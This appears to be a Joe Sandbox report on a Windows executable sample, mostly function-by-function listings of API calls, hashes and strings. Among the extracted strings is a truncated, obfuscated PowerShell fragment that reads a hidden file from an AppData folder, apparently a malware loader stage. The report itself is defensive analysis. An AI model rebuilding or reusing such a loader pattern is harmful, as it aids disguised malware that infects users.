Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
Instruction ID: d706231c2cc37d53405596eccba3c731e42e433def08e4c59de364e12d4351e7
Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
Instruction Fuzzy Hash: 3EC09B757447017FEA108F609D47F1777687B64702F1844397640F50D0CBB4D510DA1C

Function 00403FCA Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08

Function 00403192 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Function 00403FB7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08

Non-executed Functions

Function 00404976 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 0040498E
GetDlgItem.USER32(?,00000408), ref: 00404999
GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
LoadBitmapW.USER32(0000006E), ref: 004049F6
SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
DeleteObject.GDI32(00000000), ref: 00404A6C
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
ShowWindow.USER32(?,00000005), ref: 00404BC6
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
ImageList_Destroy.COMCTL32(?), ref: 00404D96
GlobalFree.KERNEL32(?), ref: 00404DA6
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
ShowWindow.USER32(?,00000000), ref: 00404F45
GetDlgItem.USER32(?,000003FE), ref: 00404F50
ShowWindow.USER32(00000000), ref: 00404F57

Strings

M, xrefs: 00404B20
N, xrefs: 00404C01
, xrefs: 00404F2F

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58

Function 00404430 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040447F
SetWindowTextW.USER32(00000000,?), ref: 004044A9
SHBrowseForFolderW.SHELL32(?), ref: 0040455A
CoTaskMemFree.OLE32(00000000), ref: 00404565
lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 00404597
lstrcatW.KERNEL32(?,: Completed), ref: 004045A3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5

Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520

Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 0040603D
Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406051
Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76233420,00403390), ref: 00406064

GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717

Strings

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00404580
"$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich, xrefs: 00404449
: Completed, xrefs: 00404591, 00404596, 004045A1
A, xrefs: 00404553

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich$: Completed$A$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
API String ID: 2246997448-3744651803
Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
API String ID: 542301482-2519038138
Opcode ID: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
Opcode Fuzzy Hash: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54

Function 00402706 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
Opcode Fuzzy Hash: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29

Function 004064EC Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44

Function 00404132 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
GetDlgItem.USER32(?,000003E8), ref: 004041E4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
GetSysColor.USER32(?), ref: 00404212
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
lstrlenW.KERNEL32(?), ref: 00404233
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
GetDlgItem.USER32(?,0000040A), ref: 004042AE
SendMessageW.USER32(00000000), ref: 004042B5
GetDlgItem.USER32(?,000003E8), ref: 004042E0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
LoadCursorW.USER32(00000000,00007F02), ref: 00404331
SetCursor.USER32(00000000), ref: 00404334
ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
LoadCursorW.USER32(00000000,00007F00), ref: 00404355
SetCursor.USER32(00000000), ref: 00404358
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399

Strings

@.C, xrefs: 0040433E
open, xrefs: 00404341
N, xrefs: 004042CE

Memory Dump Source

Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.C$N$open
API String ID: 3615053054-801394694
Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98

Function 00405A52 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F

Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
